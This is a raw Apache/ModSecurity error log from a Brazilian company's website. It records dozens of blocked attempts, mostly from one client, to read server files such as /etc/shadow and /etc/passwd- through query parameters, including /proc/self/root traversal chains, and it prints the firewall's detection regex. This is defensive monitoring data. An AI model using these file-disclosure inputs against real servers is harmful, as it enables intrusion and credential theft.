[Fri Mar 20 09:20:27.312786 2026] [:error] [pid 11642:tid 140411557287680] [client 216.73.216.191:59256] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07i7ninkcc-iUj5ApueQAAA5Y"]
[Fri Mar 20 09:20:35.151776 2026] [:error] [pid 7235:tid 140411641214720] [client 216.73.216.191:59748] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07k_qxLDW4GITHUkT6BwAAAQw"]
[Fri Mar 20 09:20:35.387117 2026] [:error] [pid 9818:tid 140411599251200] [client 216.73.216.191:59772] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07k11pVZ5mVmJwsFNBhQAAAFE"]
[Fri Mar 20 09:20:37.836197 2026] [:error] [pid 31215:tid 140411733534464] [client 216.73.216.191:59810] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07lAF0L0L-SsrnPo54gwAAAsE"]
[Fri Mar 20 09:20:44.371132 2026] [:error] [pid 11167:tid 140411725141760] [client 216.73.216.191:60328] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07nPHIg5MgXLBnicMHGQAAAcI"]
[Fri Mar 20 09:20:47.142100 2026] [:error] [pid 7893:tid 140411540502272] [client 216.73.216.191:60430] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07nhCii7xarUs8iHZ31wAAAhg"]
[Fri Mar 20 09:20:49.526303 2026] [mime_magic:error] [pid 7893:tid 140411574073088] (70014)End of file found: [client 216.73.216.191:60588] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:20:49.985829 2026] [mime_magic:error] [pid 11642:tid 140411725141760] (70014)End of file found: [client 57.141.18.49:60624] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:20:50.543971 2026] [:error] [pid 9818:tid 140411674785536] [client 216.73.216.191:60648] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07ol1pVZ5mVmJwsFNBlAAAAEg"]
[Fri Mar 20 09:20:53.949343 2026] [:error] [pid 21219:tid 140411548894976] [client 216.73.216.191:60806] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07pPXLqtnMIWvjpaKqVAAAApc"]
[Fri Mar 20 09:21:01.250478 2026] [:error] [pid 10189:tid 140411632822016] [client 216.73.216.191:32942] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07qzJ3M9BSuKP7CAYu9wAAAI0"]
[Fri Mar 20 09:21:04.413841 2026] [mime_magic:error] [pid 15826:tid 140411565680384] (70014)End of file found: [client 176.65.132.19:52467] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/wp-login.php
[Fri Mar 20 09:21:08.312332 2026] [:error] [pid 21219:tid 140411674785536] [client 216.73.216.191:33444] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07tPXLqtnMIWvjpaKqXQAAAog"]
[Fri Mar 20 09:21:08.495280 2026] [:error] [pid 7235:tid 140411540502272] [client 216.73.216.191:33400] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07tPqxLDW4GITHUkT6JwAAARg"]
[Fri Mar 20 09:21:17.922232 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.243.128:60722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07vQF0L0L-SsrnPo54wAAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:21:19.353489 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.243.128:43580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07v11pVZ5mVmJwsFNBtAAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:21:19.720983 2026] [:error] [pid 26799:tid 140411708356352] [client 216.73.216.191:34234] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07v9a6ubjKNq_cu4bnUwAAA0Q"]
[Fri Mar 20 09:21:20.531076 2026] [:error] [pid 21219:tid 140411599251200] [client 216.73.216.191:34302] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07wPXLqtnMIWvjpaKqdwAAApE"]
[Fri Mar 20 09:21:23.187208 2026] [:error] [pid 10189:tid 140411674785536] [client 216.73.216.191:34498] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07wzJ3M9BSuKP7CAYvCgAAAIg"]
[Fri Mar 20 09:21:28.421814 2026] [mime_magic:error] [pid 11167:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:34818] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:21:33.468503 2026] [:error] [pid 26799:tid 140411565680384] [client 216.73.216.191:35088] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07zda6ubjKNq_cu4bncQAAA1U"]
[Fri Mar 20 09:21:34.221908 2026] [mime_magic:error] [pid 21219:tid 140411666392832] (70014)End of file found: [client 74.7.243.128:49390] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/bin
[Fri Mar 20 09:21:34.260115 2026] [:error] [pid 9818:tid 140411649607424] [client 216.73.216.191:35150] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab07zl1pVZ5mVmJwsFNBvQAAAEs"]
[Fri Mar 20 09:21:40.643326 2026] [:error] [pid 31215:tid 140411574073088] [client 216.73.216.191:35574] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab071AF0L0L-SsrnPo544AAAAtQ"]
[Fri Mar 20 09:21:42.139154 2026] [:error] [pid 11167:tid 140411674785536] [client 216.73.216.191:35616] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab071fHIg5MgXLBnicMHVwAAAcg"]
[Fri Mar 20 09:21:42.467487 2026] [:error] [pid 31215:tid 140411557287680] [client 216.73.216.191:35660] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab071gF0L0L-SsrnPo545QAAAtY"]
[Fri Mar 20 09:21:42.619280 2026] [mime_magic:error] [pid 11167:tid 140411599251200] (70014)End of file found: [client 57.141.18.1:35672] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:21:42.940851 2026] [mime_magic:error] [pid 31215:tid 140411616036608] (70014)End of file found: [client 216.73.216.191:35696] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:21:51.589584 2026] [:error] [pid 15826:tid 140411699963648] [client 216.73.216.191:36376] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab073-oXxyEfFpUF8f-Q_gAAAUU"]
[Fri Mar 20 09:21:52.717832 2026] [mime_magic:error] [pid 21219:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:36472] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:21:54.646017 2026] [mime_magic:error] [pid 10189:tid 140411733534464] (70014)End of file found: [client 57.141.18.65:36592] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:21:56.459345 2026] [:error] [pid 7893:tid 140411632822016] [client 216.73.216.191:36716] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab075BCii7xarUs8iHZ4KQAAAg0"]
[Fri Mar 20 09:21:58.772116 2026] [:error] [pid 11167:tid 140411548894976] [client 216.73.216.191:36866] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab075vHIg5MgXLBnicMHcQAAAdc"]
[Fri Mar 20 09:21:59.570275 2026] [mime_magic:error] [pid 31215:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:36916] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:22:05.303920 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:58518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0769a6ubjKNq_cu4bnxAAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
